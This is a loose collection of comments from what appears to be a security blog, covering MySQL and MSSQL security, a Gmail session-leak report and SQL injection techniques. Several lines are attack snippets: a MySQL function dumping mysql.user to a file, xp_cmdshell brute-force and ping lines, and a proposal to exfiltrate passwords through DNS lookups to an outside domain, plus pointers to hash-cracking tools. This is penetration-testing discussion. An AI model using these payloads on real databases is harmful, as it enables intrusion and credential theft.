Actually I’ve found that for internally developed applications (as in within companies by in-house developers) stored procedures are quite rare on MySQL compared to Oracle (which probably explains why I haven’t seen SQL Security Invoker used). In fact overall I’d say I’m more likely to see Oracle security than MySQL security (in terms of application use, I don’t see people hardening databases themselves at all).

Do you see many differences between Oracle and MySQL security functionality use in web apps?

mysql> create function testing(input varchar(100)) returns varchar(50) READS SQL DATA sql security invoker
-> begin
-> DECLARE sUserName VARCHAR(50);
-> select user into outfile ‘/tmp/a.txt’ from mysql.user;
-> return ‘aaa’;
-> end
-> //
Query OK, 0 rows affected (0.01 sec)

mysql> call sp_root(testing(1));
-> //
ERROR 1045 (28000): Access denied for user ‘test’@'%’ (using password: NO)

“Thanks for your report on the GMail session-id-in-URL leak - nicely spotted! This affects a subset of people, so I’m glad you pointed it out. As you noted in your blog post, we’ve made sure this no longer appears in the URL. That’s issue #2 in your blog post. Unlike issue #2, issue #1 does not relate to any mail.google.com data.”

My response:-

issue1:- My Mistake, i did not see the hostname correctly. Yes, it may not have a direct impact on mail.google.com but an attacker could change the http response and thus present a victim with a login page which will submit the credentials to an attacker controlled website. This attack will be quite stealth and will fail the existence of https as the URL will say http://www.google.com. Further, i haven’t looked into what an attacker could do with cookies obtained via the http request. Not all cookies are marked secure, and i am not sure if the cookies not marked as secure can be used to obtain a secure cookie too or if they can used in google accounts etc. All in all, it may be worth fixing it.:)

I would like improve my SQL knowledge.
I red so many SQL books and would like to
read more about SQL for my position as oracle database manager.

What would you recommend?

Thanks,
Werutz

reply to my e-mail, I’m not likely to come and check the reactions.

first of all congratulations for your blog!
Just some notes about this post:
On Microsoft SQL Server 2000 such query does not always return the hashes in the password field, even with their own Query Analyzer it returns NULL, depending on the Service Pack of the SQL Server itself (tested on SP0), you’ve to use a cast algorithm to do such, I implemented it on sqlmap, you can find the source code at http://sqlmap.sourceforge.net/dev/plugins.mssqlserver-pysrc.html#MSSQLServerMap.getPasswordHashes if you’re interested in further details.
Cain and Abel does the work properly cracking MSSQL password hashes, but I suggest you to give a try also to http://www.ngssoftware.com/products/database-security/ngs-sqlcrack.php, if you do not know it already. The algorithm implemented uses native DLL functions to speed up the process of cracking.

Cheers,
Bernardo

select null from openrowset(’sqloledb’,”;’sa’;’[password]’,’exec
master..xp_cmshell ”ping my_host”’). I will confirm this sometime later.

I thought of a possible refinement to your idea. Maybe you could get
the query to send a DNS request containing the password.

Instead of:

exec master..xp_cmshell “ping myhost”

Do:

exec master..xp_cmshell “ping [password].notsosecure.com”

Listen for the DNS request on your nameserver. Outbound ping might be
blocked, but outbound DNS is less likely to be blocked.

Ref: http://pentestmonkey.net/blog/mssql-dns/

Just a thought.

I’ve often wondered how google and hotmail uses its remember me feature ?